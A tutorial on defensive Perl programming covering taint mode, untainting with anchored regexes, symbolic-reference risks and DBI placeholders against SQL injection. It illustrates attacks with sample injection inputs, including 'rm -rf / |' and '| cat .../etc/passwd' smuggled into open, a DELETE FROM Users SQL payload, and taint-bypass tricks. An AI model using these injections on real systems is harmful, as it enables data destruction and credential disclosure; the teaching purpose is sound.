I can’t control how people run my programs or
what input they give it, and given the chance, they’ll do everything I
don’t expect. This can be a problem when my program tries to pass on
that input to other programs. When I let just anyone run my programs,
like I do with web applications, I have to be especially careful. Perl
comes with features to help me protect myself against that, but they
only work if I use them, and use them wisely.
If I don’t pay attention to the data I pass to
functions that interact with the operating system, I can get myself in
trouble. Take this innocuous-looking line of code that opens a file:
open my $fh, $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do such things as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:
my $file = $ARGV[0];
# OR ===
my $file = $ENV{FOO_CONFIG};
How can that cause problems? Look at the documentation for open. Have you ever read all of the 400-plus lines in its entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page! Several of those ways involve opening a pipe to another program:
open my $fh, "wc -l *.pod |";
open my $fh, '| mail joe@example.com';
To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:
% perl program.pl "| mail joe@example.com"
% FOO_CONFIG="rm -rf / |" perl program.pl
This can be especially nasty if I can get
another user to run this for me. Any little chink in the armor
contributes to the overall insecurity. Given enough pieces to put
together, someone eventually gets to the point where they can compromise
the system.
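One way to take the pipe behavior away from open is to state the mode separately. This is only a minimal sketch, and open_for_reading is a hypothetical helper name, not something from a module. With the three-argument form, open treats whatever is in the filename as a filename, so a | at either end no longer asks for a pipe:

```perl
use strict;
use warnings;

# Hypothetical helper: open a file for reading only, never as a pipe.
sub open_for_reading {
    my( $file ) = @_;
    return unless defined $file;

    # With an explicit '<' mode, a leading or trailing | in the
    # name is just part of a filename, not a request for a pipe.
    open my $fh, '<', $file or return;
    return $fh;
}

for my $name ( '| mail joe@example.com', 'rm -rf / |' ) {
    my $fh = open_for_reading( $name );
    print defined $fh ? "Opened [$name]\n" : "Could not open [$name]: $!\n";
}
```

Unless files with those odd names really exist, both attempts simply fail to open, and no external program runs.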
There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything open can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.
Taint Checking
Configuration is all about reaching outside
the program to get data. When users choose the input, they can choose
what the program does. This is more important when I write programs for
other people to use. I can trust myself to give my own program the right
data (usually), but other users, even those with the purest of
intentions, might get it wrong.
Under taint checking, Perl doesn’t let me
use unchecked data from outside the source code to affect things outside
the program. Perl will stop my program with an error. Before I show
more, though, understand that taint checking does not prevent bad things
from happening. It merely helps me track down areas where some bad
things might happen and tells me to fix those.
When I turn on taint checking with the -T switch, Perl marks any data that come from outside the program as
tainted, or insecure, and Perl won’t let me use those data to interact
with anything outside of the program. This way, I can avoid several
security problems that come with communicating with other processes.
This is all or nothing. Once I turn it on, it applies to the whole
program and all of the data.
Perl sets up taint checking at compile time, and
it affects the entire program for the entirety of its run. Perl has to
see this option very early to allow it to work. Here’s a toy program
that uses the external command echo to print a message:
#!/usr/bin/perl
# tainted_args.pl

system qq|echo "Args are -> @ARGV"|;
When I run this normally, there’s no problem:
% perl tainted_args.pl Amelia
Args are -> Amelia
When I specify the -T switch on the command line, I turn on taint checking and run into a problem. The %ENV hash is tainted, and the problem is its PATH component, which something like system or exec might use to locate an external program (but more on that coming up):
% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.
If I always want taint checking, I can put it on the shebang line:
#!/usr/bin/perl -T
# tainted_args_shebang.pl

system qq|echo "Args are -> @ARGV"|;
When I run perl without the -T while -T is on the shebang line, I have a problem:
% perl tainted_args_shebang.pl Amelia
"-T" is on the #! line, it must also be used on the command line at tainted_args_shebang.pl line 1.
If I call the program with perl, I have to specify the -T in both places, which brings me back to the same error:
% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.
I can get rid of this duplication by not calling perl explicitly and running the program directly:
% ./tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.
Now I fix that error by getting rid of the PATH key in %ENV and using the full path to echo in my system call:
#!/usr/bin/perl -T
# tainted_args_no_path.pl

delete $ENV{PATH};
system qq|/bin/echo "Args are -> @ARGV"|;
Now I have another problem:
% ./tainted_args_no_path.pl foo
Insecure dependency in system while running with -T switch at ./tainted_args_no_path.pl line 5.
I tried to interpolate @ARGV into that system call, but that’s tainted too. I show how to fix that later.
Warnings Instead of Fatal Errors
With the -T switch, taint violations are fatal errors, and that’s generally a good thing.
However, if I’m handed a program developed without careful attention
paid to taint, I still might want to run the program. It’s not my fault
it’s not taint safe yet, so perl has a gentler version of taint checking.
The -t switch (that’s the little brother to -T) does the same thing as normal taint checking but merely issues warnings when it encounters a problem. This is only intended as a development feature so I can check for problems before I give the public the chance to try its data on the program:
% perl -t tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -t switch at tainted_args_no_path.pl line 5.
Args are -> Amelia
I get the same message, this time as a warning, and the program continues.
Similarly, the -U switch lets Perl perform otherwise unsafe operations, effectively turning off taint checking. Perhaps I’ve added -T to a program that is not taint safe yet, but I’m working on it and want to see it run even though I know there is a taint violation:
% perl -TU tainted_args_no_path.pl Amelia
Args are -> Amelia
I still have to use -T on the command line, though, or I get a “too late” message and the program does not run:
% perl -U tainted_args_no_path.pl Amelia
Too late for "-T" option at tainted_args_no_path.pl line 1.
If I also turn on warnings (as I always do, right?), I’ll get the taint warnings just like I did with -t:
% perl -TU -w tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -T switch at tainted_args_no_path.pl line 5.
Args are -> Amelia
Inside the program, I can check the actual situation by looking at the value of the Perl special variable ${^TAINT}. It’s true if I have enabled any of the taint modes (including with -U), and false otherwise. For normal, fatal-error taint checking it’s 1, and for the reduced-effect, warnings-only taint checking it’s -1. Don’t try to modify it; it’s a read-only value. Remember, it’s either all or nothing with taint checking.
Automatic Taint Mode
Sometimes Perl turns on taint checking for me.
When Perl sees that the real and effective users or groups are different
(so, I’m running the program as a different user or group than I’m
logged in as), Perl realizes that I have the opportunity to gain more
system privileges than I normally have and turns on taint checking. This
way, when other users have to use my program to interact with system
resources, they don’t get the chance to do something they shouldn’t by
carefully selecting the input. That doesn’t mean the program is secure; it’s only as secure as using taint checking wisely can make it.
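To see what Perl decided for a particular run, I can compare the real and effective IDs myself and look at ${^TAINT}. This is a rough sketch; taint_status is a hypothetical helper name, and it only reports the situation without changing anything:

```perl
use strict;
use warnings;

# Hypothetical helper: report the ID situation and the taint mode.
sub taint_status {
    # $< and $> are the real and effective user IDs. $( and $) are
    # the real and effective group IDs, which can hold a
    # space-separated list, so compare only the first number in each.
    my( $gid )  = split ' ', $(;
    my( $egid ) = split ' ', $);
    my $ids_differ = ( $< != $> ) || ( $gid != $egid );

    my $mode = ${^TAINT} ==  1 ? 'fatal'
             : ${^TAINT} == -1 ? 'warnings only'
             :                   'off';

    return { ids_differ => $ids_differ ? 1 : 0, mode => $mode };
}

my $status = taint_status();
print "Real and effective IDs differ: $status->{ids_differ}\n";
print "Taint mode: $status->{mode}\n";
```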
mod_perl
Since I have to enable taint checking early in Perl’s run, mod_perl needs to know about tainting before it runs a program. In my Apache server configuration, I use the PerlTaintCheck directive for mod_perl 1.x:
PerlTaintCheck On
In mod_perl 2, I include -T in the PerlSwitches directive:
PerlSwitches -T
I can’t use this in .htaccess files or other, later configurations. I have to turn it on for all of mod_perl, meaning that every program run through mod_perl, including otherwise normal CGI programs run with ModPerl::PerlRun or ModPerl::Registry, uses it. This might annoy users for a bit, but when they get used to the better programming techniques, they’ll find something else to gripe about.
Tainted Data
Data are either tainted or not. There isn’t any
part- or half-taintedness. Perl only marks scalars (data or variables)
as tainted, so although an array or hash may hold tainted data, they
aren’t tainted themselves. Perl never taints hash keys, which aren’t full
scalars with all of the scalar overhead. Remember that because it comes
up later.
I can check for taintedness in a couple of ways. The easiest is the tainted function from Scalar::Util:
#!/usr/bin/perl -T
# check_taint.pl
use Scalar::Util qw(tainted);
# this one won't work
print "ARGV is tainted\n" if tainted( @ARGV );
# this one will work
print "Argument [$ARGV[0]] is tainted\n" if tainted( $ARGV[0] );
When I specify arguments on the command line, they come from outside the program so Perl taints them. The @ARGV array is fine, but its first element, $ARGV[0], isn’t:
% check_taint.pl foo
Argument [foo] is tainted
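Another way, adapted from an idiom in the perlsec documentation, doesn’t need a module at all. It builds a zero-length string from its arguments, which is still tainted if any argument was, and tries to eval it. Under taint checking that eval dies when the string is tainted, and the outer eval turns that into a true or false answer. Treat this as a sketch of the idea:

```perl
use strict;
use warnings;

# Returns true if any argument is tainted, false otherwise.
sub is_tainted {
    local $@;    # don't clobber the caller's $@

    # substr( ..., 0, 0 ) is empty but keeps the taint of its source.
    # The string eval of "#" is a harmless comment unless the string
    # is tainted, in which case taint checking makes it die.
    return ! eval { eval( "#" . substr( join( "", @_ ), 0, 0 ) ); 1 };
}

print "Argument [$_] is ", ( is_tainted( $_ ) ? "" : "not " ), "tainted\n"
    for @ARGV;
```

Without taint checking turned on, nothing is tainted, so this always returns false.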
Any subexpression that involves tainted data inherits taintedness. Tainted data are viral. The next program uses File::Spec to create a path in which the first part is my home directory. I want to open that file, read it line by line, and print those lines to standard output. That should be simple, right?
#!/usr/bin/perl -T
# show_file.pl
use strict;
use warnings;
use File::Spec;
use Scalar::Util qw(tainted);
my $path = File::Spec->catfile( $ENV{HOME}, "data.txt" );
print "Result [$path] is tainted\n" if tainted( $path );
# two-argument open: a leading | in $path would start a pipe
open my $fh, $path or die "Could not open $path";
print while( <$fh> );
The problem is the environment. All of the values in %ENV come from outside the program, so Perl marks them as tainted. Any value I create based on a tainted value becomes tainted as well. That’s a good thing, since $ENV{HOME} can be whatever the user wants, including something malicious, such as this line that starts off the HOME directory with a | and then runs a command. This variety of attack has actually worked to grab the password files on big web sites that do a similar thing in CGI programs. Even though I don’t get the passwords, once I know the names of the users on the system, I’m ready to spam away:
% HOME="| cat ../../../etc/passwd;" ./show_file.pl
Under taint checking, I get an error because Perl catches the | character I tried to sneak into the filename:
Insecure dependency in piped open while running with -T switch at ./show_file.pl line 12.
Side Effects of Taint Checking
When I turn on taint checking, Perl does
more than just mark data as tainted. It ignores some other information
because it can be dangerous. Taint checking causes Perl to ignore PERL5LIB and PERLLIB. A user can set either of those so a program will pull in any code he wants. Instead of finding the File::Spec from the Perl standard distribution, my program might find a different one if an impostor File/Spec.pm shows up first during Perl’s search through @INC for the file. When I run my program, Perl finds some File::Spec, and when it tries one of its methods, something different might happen.
To get around an ignored PERL5LIB, I can use the lib module or the -I switch, which is fine with taint checking (although it doesn’t mean I’m safe):
% perl -Mlib=/Users/brian/lib/perl5 program.pl
% perl -I/Users/brian/lib/perl5 program.pl
I can even use PERL5LIB on the command line. I’m not endorsing this, but it’s a way people can get around your otherwise good intentions:
% perl -I$PERL5LIB program.pl
Also, Perl treats the PATH as dangerous. It’s something that the person running this program can set to anything they like. Otherwise, I could use the program running under special privileges to write to places where I shouldn’t. Even then, I can’t trust the PATH for the same reason that I can’t trust PERL5LIB. I can’t tell which program I’m really running if I don’t know where it is. In this example, I use system to run the cat command. I don’t know which executable it actually is because I rely on the path to find it for me:
#!/usr/bin/perl -T
# cat.pl
system "cat /Users/brian/.bashrc"
Perl’s taint checking catches the problem:
Insecure $ENV{PATH} while running with -T switch at ./cat.pl line 3.
Using the full path to cat in the system command doesn’t help by itself. Rather than figuring out when the PATH should apply and when it shouldn’t, Perl always treats it as insecure, so I also have to remove PATH from %ENV:
#!/usr/bin/perl -T
delete $ENV{PATH};
system "/bin/cat /Users/brian/.bashrc"
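Instead of deleting PATH, I can set it to a short list of directories that I trust. The perlsec documentation suggests something along the lines of this sketch, which also clears a few other variables that shells pay attention to. The scrub_environment name and the particular directory list are assumptions for illustration:

```perl
use strict;
use warnings;

# Hypothetical helper: give child processes a small, known environment.
sub scrub_environment {
    # A fixed PATH of directories I trust (an assumption for this
    # sketch; adjust the list for the actual system).
    $ENV{PATH} = '/bin:/usr/bin';

    # Remove variables that can quietly change how a shell behaves.
    delete @ENV{ qw(IFS CDPATH ENV BASH_ENV) };

    return;
}

scrub_environment();
print "PATH is now $ENV{PATH}\n";
```

Since I assign a literal string from my own source code, the new PATH value is not tainted.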
In a similar way, the other environment variables such as IFS, CDPATH, ENV, or BASH_ENV can be problems. Their values can have hidden influence on things I try to do within my program.
Untainting Data
The only approved
way to untaint data is to extract the good parts of it using the
regular expression memory matches. By design, Perl does not taint the
parts of a string that I capture in regular expression memory, even if
Perl tainted the source string. Perl trusts me to write a safe regular
expression. Again, it’s up to me to make it safe.
In this line of code, I untaint the first element of @ARGV to extract a filename. I use a character class to specify exactly what I want. In this case, I only want letters, digits, underscores, dots, and hyphens. I don’t want anything that might be a directory separator:
my( $file ) = $ARGV[0] =~ m/\A([A-Z0-9_.-]+)\z/i;
I constrain the regular expression so it has to
match the entire string, too. That is, if it contains any characters
that I didn’t include in the character class, the match fails. I’m not
going to try to change invalid data into good data. You’ll have to think
about how you want to handle that for each situation.
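Here is one way I might wrap that match so the rest of the program has to deal with failure. It’s a minimal sketch: untaint_filename is a hypothetical helper name, and it rejects bad input outright rather than trying to repair it:

```perl
use strict;
use warnings;

# Hypothetical helper: return an untainted filename, or undef if the
# input has any character outside the allowed set.
sub untaint_filename {
    my( $input ) = @_;
    return unless defined $input;

    # The capture is what Perl considers untainted; the anchors make
    # the whole string match or nothing at all.
    my( $file ) = $input =~ m/\A([A-Z0-9_.-]+)\z/i;
    return $file;    # undef when the match fails
}

for my $candidate ( 'data.txt', '../etc/passwd', '| mail joe@example.com' ) {
    my $file = untaint_filename( $candidate );
    print defined $file ? "ok:       [$file]\n" : "rejected: [$candidate]\n";
}
```

Only the first candidate gets through; the other two contain characters that aren’t in the class.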
It’s really easy to use this incorrectly and some
people annoyed with the strictness of taint checking try to untaint
data without really untainting it. I can remove the taint of a variable
with a trivial regular expression that matches everything:
my( $file ) = $ARGV[0] =~ m/(.*)/s;
If I want to do something like this, I might as
well not even use taint checking. You might look out for this if you
require your programmers to use taint checking and they want to avoid
the extra work to do it right. I’ve caught this sort of statement in
many code reviews, and it always surprises me that people get away with
it.
I might be more diligent and still wrong, though. The character class shortcuts, \w and \W (and the POSIX version [:word:]), actually take their definitions from the locales. As a clever cracker, I
could manipulate the locale setting in such a way to let through the
dangerous characters I want to use. Instead of the implicit range of
characters from the shortcut, I should explicitly state which characters
I want. I can’t be too careful. It’s easier to list the allowed
characters and add ones that I miss than to list the forbidden
characters, since it also excludes problem characters I don’t know about
yet.
If I turn off locale support, this isn’t a problem and I can use the character class shortcuts again. Perl uses the internal locale instead of the user setting (from LC_CTYPE for regular expressions). After turning off locale, \w is just ASCII letters, digits, and the underscore:
{
    no locale;
    my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}
Mark Jason Dominus noted in his http://perl.plover.com/yak/security/ talk that there are two approaches to constructing regular expressions for untainting data, which he labels as the Prussian Stance and the American Stance. I’ve also seen these called “whitelisting” and “blacklisting”. In the Prussian Stance, I explicitly list only the characters I allow. I know all of them are safe:
# Prussian = safer
my( $file ) = $ARGV[0] =~ m/([a-z0-9_.-]+)/i;
The American Stance is less reliable. Doing it that way, I list the characters I don’t
allow in a negated character class. If I forget one, I still might have
a problem. Unlike the Prussian Stance, where I only allow safe input,
this stance relies on me knowing every character that can be bad. How do
I know I know them all?
# American = uncertainty
# the \$ keeps Perl from interpolating the special variable $%
my( $file ) = $ARGV[0] =~ m/([^\$%;|]+)/i;
I prefer something much stricter where I don’t extract parts of the input. If some of it isn’t safe, none of it is. I anchor the character class of safe characters to the beginning and end of the string. I don’t use the $ anchor since it allows a trailing newline:
# Prussian = safer
my( $file ) = $ARGV[0] =~ m/^([a-z0-9_.-]+)\z/i;
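The difference between these forms is easier to see side by side. In this sketch the three subroutine names are hypothetical; each applies the same character class with a different amount of anchoring and returns the capture, or undef when there is no match:

```perl
use strict;
use warnings;

my $allowed = qr/[a-z0-9_.-]+/i;

# Each sub returns the captured text, or undef when there is no match.
sub unanchored    { my( $m ) = $_[0] =~ m/($allowed)/;    $m }
sub dollar_anchor { my( $m ) = $_[0] =~ m/^($allowed)$/;  $m }
sub strict_anchor { my( $m ) = $_[0] =~ m/^($allowed)\z/; $m }

for my $input ( "data.txt", "data.txt\n", "rm -rf /" ) {
    ( my $shown = $input ) =~ s/\n/\\n/g;    # make the newline visible
    printf "%-12s unanchored=%-10s dollar=%-10s strict=%s\n",
        "[$shown]",
        map { defined $_ ? "[$_]" : 'no match' }
            unanchored( $input ),
            dollar_anchor( $input ),
            strict_anchor( $input );
}
```

The unanchored pattern happily extracts rm from "rm -rf /", and the $ version accepts the string with the trailing newline. Only the \z version insists that the whole string, and nothing else, is made of allowed characters.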
In some cases, I don’t want regular expressions
to untaint data. Even though I matched the data the way I wanted, I
might not intend any of that data to make its way out of the program. I
can turn off the untainting features of regular expression memory with
the re pragma:
{
    use re 'taint';
    # $file still tainted
    my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}
A more useful and more secure strategy is to
turn off the regular expression untainting globally and only turn it
back on when I actually want to use it. This can be safer because I only
untaint data when I mean to:
use re 'taint';
{
    no re 'taint';
    # $file not tainted
    my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}
IO::Handle::untaint
The IO::Handle module, which is the basis for the line input operator behavior in many cases, can untaint data for me. Since input from a file is also external data, it is normally tainted under taint checking:
use Scalar::Util qw(tainted);
open my $fh, '<', $0 or die "Could not open myself! $!";
my $line = <$fh>;
print "Line is tainted!\n" if tainted( $line );
I can tell IO::Handle to trust the data from the file. As I’ve said many times before, this doesn’t mean I’m safe. It just means that Perl doesn’t taint the data, not that it’s safe. I have to explicitly use the IO::Handle module to make this work, though:
use IO::Handle;
use Scalar::Util qw(tainted);
open my $fh, '<', $0 or die "Could not open myself! $!";
$fh->untaint;
my $line = <$fh>;
print "Line is not tainted!\n" unless tainted( $line );
This can be a dangerous operation since I’m getting around taint checking in the same way my /(.*)/ regular expression did.
Hash Keys
You shouldn’t do this, but as a Perl master (or
quiz show contestant) you can tell people they’re wrong when they try to
tell you that the only way to untaint data is with a regular
expression. You shouldn’t do what I’m about to show you, but it’s
something you should know about in case someone tries to do it near you.
Hash keys aren’t full Perl scalar values (as in
the data structure in the Perl guts, commonly called an SV), so they
don’t carry all the baggage and accounting that allows Perl to taint
data. Hash keys are just strings without annotations, so any magic that
might have been attached to the SV doesn’t stick to the hash key. If I
pass the data through a filter that uses the data as hash keys and then
returns the keys, the data are no longer tainted, no matter their source
or what they contain:
#!/usr/bin/perl -T
use Scalar::Util qw(tainted);
print "The first argument is tainted\n" if tainted( $ARGV[0] );
@ARGV = keys %{ { map { $_, 1 } @ARGV } };
print "The first argument isn't tainted anymore\n" unless tainted( $ARGV[0] );
I’ve run into people doing this inadvertently as
they take user input or configuration and stick it into a hash. The
hash values are still tainted, but I might be able to sneak in bad keys
that way.
Don’t do this.
I’d like to put that first sentence in all caps, but I know the editors
aren’t going to let me do that, so I’ll just say it again: don’t do
this. Save this knowledge for a Perl quiz show, and maybe tear it out of
this book before you pass it on to a coworker.
Taint::Util
There’s a CPAN module, Taint::Util, from Ævar Arnfjörð Bjarmason that makes it really easy to untaint any data:
use Taint::Util;
untaint $ENV{PATH};
It messes with the scalar value directly behind the scenes. But, it lets me go the other way too. I can taint data even if perl didn’t already do that for me:
use Taint::Util;
my $camel = 'Amelia';
taint $camel;
If I’m creating a bunch of potentially dangerous data that I don’t intend to ever leave the program, I can taint it myself. This is an especially paranoid, but not completely unreasonable, approach to keeping data inside the program. This is also a good utility for testing when you want to check the behavior of something when it encounters tainted data. Combining this with Test::Taint can be quite useful.
Choosing Untainted Data with Tainted Data
Another exception to the usual rule of tainting
involves the conditional operator. Earlier I said that a tainted value
also taints its expression. That doesn’t quite work for the conditional
operator when the tainted value is only in the condition that decides
which value I get. As long as the chosen value is not tainted, the
result isn’t tainted either:
my $value = $tainted_scalar ? "Amelia" : "Shlomo";
This doesn’t taint $value because the conditional operator is really just shorthand for a longer if-else block in which the tainted data aren’t in the expressions connected to $value. The tainted data only show up in the conditional:
my $value = do {
    if( $tainted_scalar ) { "Amelia" }
    else                  { "Shlomo" }
};
Symbolic References
A symbolic reference uses the value of a scalar as the name of a variable. This happens when I use a nonreference as a reference:
my $name = 'Amelia';
$$name = 'Camel'; # sets $Amelia
I tried to dereference $name. Since that variable wasn’t a reference, perl used the value in that variable, Amelia, as the name of the variable that it would assign to.
I can do this with any of the data types, including the names of subroutines:
my $sub_name = time % 2 ? 'make_camel' : 'make_llama';
&$sub_name( @arguments );
I can use a symbolic method name too:
my $method = time % 2 ? 'make_camel' : 'make_llama';
$object->$method( @arguments );
This is a useful feature for a dynamic language,
but it’s also a dangerous feature. If I take those subroutine or method
names from user data, I might inadvertently let the user do things I
had not anticipated. This is particularly pernicious because a user can
sneak in a fully qualified subroutine name:
my $method = $ARGV[0]; # POSIX::exit
$object->$method( @arguments );
Here’s a small program that implements a
simple interpreter that’s designed to let the user decide which
subroutine they want to run:
# repl.pl
use v5.10;
use POSIX;
use Cwd qw(getcwd);
say "Cwd is ", getcwd();
REPL: {
    print ">>> ";
    local $_ = <>; # local, since newer perls no longer allow my $_
    last REPL if /quit/;
    chomp;
    my( $operation, $operand ) = split /\s+/;
    my $value = eval { &$operation( $operand ) };
    say "$operation( $operand ) => $value";
    redo;
}
sub factorial {
    my $p = 1;
    $p *= $_ foreach ( 1 .. $_[0] );
    $p
}
sub summerial {
    my $p = 0;
    $p += $_ foreach ( 1 .. $_[0] );
    $p
}
say "Cwd is now ", getcwd();
say "Got to the end";
My run starts innocently enough as I call the two subroutines I defined, but then I sneak in POSIX::chdir:
% perl repl.pl
Cwd is /Users/Amelia
>>> factorial 5
factorial( 5 ) => 120
>>> summerial 9
summerial( 9 ) => 45
>>> POSIX::chdir /Volumes/Scratch
POSIX::chdir( /Volumes/Scratch ) => 1
>>> quit
Cwd is now /Volumes/Scratch
Got to the end
After I leave the loop, I see that I’ve changed
the current working directory. A more complicated program might read
from files it shouldn’t or leave behind files I won’t notice.
I can do the same with a method call through
a quirk of Perl’s method lookup. If I give a full package specification
in the method, perl calls exactly that subroutine even if it has nothing to do with the class.
# other_method.pl
use v5.14; # the package block syntax needs v5.14
use CGI;
package Camel {
    sub new { bless {}, $_[0] }
    sub clone { ... }
}
my( $method, @args ) = @ARGV;
$method //= 'new';
my $object = Camel->$method( @args );
say "object is type $object";
I run it first with no argument, which selects the new method by default, and I get back the Camel object that I expect:
% perl5.14.2 other_method.pl
object is type Camel=HASH(0x7f8413806268)
When I call it with CGITempFile::new, I get a CGITempFile object back:
% perl5.14.2 other_method.pl CGITempFile::new
object is type CGITempFile=SCALAR(0x7fefd3031130)
I chose that class for a reason. Its DESTROY method tries to unlink a file. I didn’t give an additional argument so it has no file to try to remove. The CGITempFile class comes from the CGI module, which shipped with Perl through v5.20 and is likely to be there on older installations. I can potentially delete a file doing this.
If I want to choose a subroutine or method based on a variable’s value, there are several things I can do to ensure I don’t allow too much. My most common tactic is to make a lookup table of allowed names:
use v5.10; # for state
use Carp qw(croak);
sub _is_allowed {
    my( $self, $method ) = @_;
    state $allowed = { some_sub => 1, };
    return exists $allowed->{$method};
}
if( $self->_is_allowed( $method ) ) {
    $self->$method( @arguments );
}
else {
    croak "Disallowed method! [$method]";
}
I stay away from solutions that check the form of the value, for instance ensuring that there are only identifier characters:
if( $method =~ /\A\p{ID_Start}\p{ID_Continue}*\z/ ) {
    $self->$method( @arguments );
}
else {
    croak "Disallowed method! [$method]";
}
A class might have more subroutines defined in
the symbol table than I anticipate, especially if other modules imported
symbols. I typically don’t want to allow something to call any defined
subroutine. Not only that, a subroutine name that has the right form
might not be defined. That would cause a fatal error when I try to call
it.
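For plain subroutines, I can go a step further and never use the user’s string as a name at all. In this sketch, which reworks the interpreter idea from repl.pl, the input is only a key into a hash of code references. The run_operation name and the digits-only operand check are assumptions for illustration:

```perl
use strict;
use warnings;

# Only the operations listed here can ever run.
my %dispatch = (
    factorial => sub { my $p = 1; $p *= $_ for 1 .. $_[0]; $p },
    summerial => sub { my $p = 0; $p += $_ for 1 .. $_[0]; $p },
);

# Hypothetical helper: run one line of input, such as "factorial 5".
# Returns undef for anything that isn't in the table.
sub run_operation {
    my( $line ) = @_;
    my( $operation, $operand ) = split ' ', $line;

    return unless defined $operation and exists $dispatch{$operation};
    return unless defined $operand   and $operand =~ m/\A[0-9]+\z/;

    return $dispatch{$operation}->( $operand );
}

for my $line ( 'factorial 5', 'summerial 9', 'POSIX::chdir /Volumes/Scratch' ) {
    my $value = run_operation( $line );
    print "$line => ", ( defined $value ? $value : 'not allowed' ), "\n";
}
```

A fully qualified name such as POSIX::chdir is just a key that doesn’t exist in the hash, so nothing gets called.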
Defensive Database Programming with DBI
It used to be that buffer overflows were the
major source of security problems. Now that the world seems to be run by
database servers, SQL injection attacks are more worrisome. If I didn’t
know any better, I might make a database query by interpolating data
from user data into a string which I then send to a database server. I’m
still using -T, but as I said before, it’s a development aid, not a guarantee. There are two big problems in this code:
#!/usr/bin/perl -T
use CGI;
use DBI;
my $cgi = CGI->new;
my $dbh = DBI->connect( ... ); # fill in the details yourself
my $name = $cgi->param( 'username' );
my $query = "SELECT * FROM Users WHERE name='$name'";
my $result = $dbh->selectrow_hashref( $query );
First, I have no idea what the value of $name is. What if it has a literal single-tick in it? What if $name is Amelia' OR name='root? Once I interpolate the string, my query looks like:
SELECT * FROM Users WHERE name='Amelia' OR name='root'
The results of the query, which I’ve now crafted
in a special way, might return information I’m not supposed to have.
Have you ever wondered why you can’t have spaces or punctuation in your
web site usernames? Most likely the application can’t handle this very
situation (probably because the programmers are lazy, not because the
technology is inferior), so they simply limit the characters you can
use.
I could be even more malicious by trying to corrupt a database. Instead of expanding the SELECT statement in my last example, I can try to run a completely new SQL statement. What if the HTML form username is Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='?
SELECT * FROM Users WHERE name='Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='';
There are plenty of people sitting at their
computer figuring out exactly what they should put in the right place to
make your application do something like this. Some do it for fun, but
some do it for profit. There are even more people with nothing better to
do than download rootkits and penetration programs they don’t
understand just so they can mess with you just to impress their friends
at your expense.
DBI can handle arbitrary values in queries without a problem. I use placeholders instead of Perl’s string interpolation. The placeholder, represented as a literal question mark, ?, reserves a spot for the value that I will use later. I make a statement handle with prepare:
my $sth = $dbh->prepare("SELECT * FROM Users WHERE name=?");
When it’s time for me to run the query, I use DBI’s execute to fill in the placeholders. I think of this like I do sprintf. The first argument to execute goes in the first placeholder, and so on:
my $rc = $sth->execute( $name );
The placeholder magic automatically quotes the
values and escapes any special characters in the value. Quote characters
in the data are no longer quote characters, semicolons don’t create new
statements, and so on. No more SQL injection vulnerability! Not only that, but once I’ve prepared a query, I can easily reuse it simply by calling execute again.
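To watch placeholders at work end to end, here’s a small sketch that assumes the DBD::SQLite driver is installed so it can use a throwaway in-memory database. The table contents and the names_matching helper are made up for the example:

```perl
use strict;
use warnings;
use DBI;

# Assumes DBD::SQLite is installed; an in-memory database keeps
# the sketch self-contained.
my $dbh = DBI->connect( 'dbi:SQLite:dbname=:memory:', '', '',
    { RaiseError => 1, PrintError => 0 } );

$dbh->do( 'CREATE TABLE Users ( name TEXT )' );

my $insert = $dbh->prepare( 'INSERT INTO Users ( name ) VALUES ( ? )' );
$insert->execute( $_ ) for qw( Amelia root );

# Prepare once, execute as many times as I like.
my $select = $dbh->prepare( 'SELECT name FROM Users WHERE name = ?' );

# Hypothetical helper: return the names that exactly match $name.
sub names_matching {
    my( $name ) = @_;
    $select->execute( $name );
    return map { $_->[0] } @{ $select->fetchall_arrayref };
}

for my $name ( 'Amelia', q(Amelia' OR name='root) ) {
    my @found = names_matching( $name );
    print "[$name] matched ", scalar @found, " row(s)\n";
}
```

The honest name matches its one row. The crafted name is treated as one odd-looking string that matches nothing, instead of rewriting the WHERE clause.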
I still haven’t solved the whole problem here.
I’ve prevented the SQL injection attack, but I still haven’t dealt with
the actual value. Even if it maintains my original query, the value
might make it do something I don’t intend.
Back in my example, I know that $name is tainted, but in this program I mistakenly discount that because I don’t
think it will matter. I’m not running a shell command with it, so it
must be safe, right?
By default, DBI doesn’t care about tainted data. If I’m being paranoid though (and that’s a good thing when it comes to security, remember), I want to scrub any data before I use them outside the program, and a database server is outside the program. Perl’s not going to stop me from using tainted data with DBI, so I tell DBI to handle that by setting TaintIn when I connect. Setting TaintIn only works if I’ve turned on taint-checking:
my $dbh = DBI->connect( $dsn, $user, $password, { TaintIn => 1, ... } );
I can also set TaintIn for just a particular statement handle:
my $sth = $dbh->prepare( "SELECT * FROM Users WHERE name=?", { TaintIn => 1, ... } );
That’s only half of it though. Once I get the results back, should I trust that data? It does come from outside the program, so maybe I shouldn’t trust it. Not too many people think about the threats from within. To taint the data in the results, I set TaintOut:
my $dbh = DBI->connect( $dsn, $user, $password, { TaintIn => 1, TaintOut => 1, ... } );
Alternatively, I can just set Taint and get them both at the same time:
my $dbh = DBI->connect( $dsn, $user, $password, { Taint => 1, ... } );
Either way, DBI will taint its results, and I have to handle them just as I would any
other tainted data. That might seem like a lot of work for something
that might never happen, but remember it only needs to happen once to
make a big mess and a lot more work for you.
